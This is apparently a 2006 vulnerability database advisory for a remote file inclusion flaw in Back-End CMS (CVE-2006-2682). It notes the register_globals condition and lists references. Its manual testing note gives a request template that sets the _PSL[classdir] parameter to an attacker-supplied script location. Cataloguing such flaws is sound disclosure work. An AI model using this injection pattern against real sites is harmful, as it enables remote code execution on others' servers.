Back-End CMS BE_config.php _PSL[classdir] Variable Remote File Inclusion

2006-05-25T06:04:10
ID OSVDB:25828
Type osvdb
Reporter OSVDB
Modified 2006-05-25T06:04:10

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

References:

Vendor URL: http://back-end.org/ Secunia Advisory ID:20292 Generic Exploit URL: http://milw0rm.com/exploits/1825 FrSIRT Advisory: ADV-2006-1979 CVE-2006-2682